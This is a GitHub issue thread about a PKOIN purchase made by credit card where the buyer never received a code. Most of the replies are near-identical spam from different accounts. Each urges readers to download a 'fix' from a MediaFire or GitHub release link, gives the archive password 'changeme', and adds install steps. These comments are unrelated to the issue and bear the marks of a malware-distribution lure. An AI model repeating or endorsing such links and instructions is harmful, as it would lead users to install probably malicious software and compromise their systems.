### ISSUE TITLE
Using credit card, PKOIN buyer never received code

### ISSUE THREAD

**Issue by Francewhoa** [pocketnetteam/pocketnet.core#431]
Find https://github.com/pocketnetteam/documentation/issues/4

I tried to move this ticket from the repository `documentation` to `pocketnet.core` But found no way to do this from my end.

**Comment by andyoknen** [comment]
Has your problem with IndaCoin been solved?

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
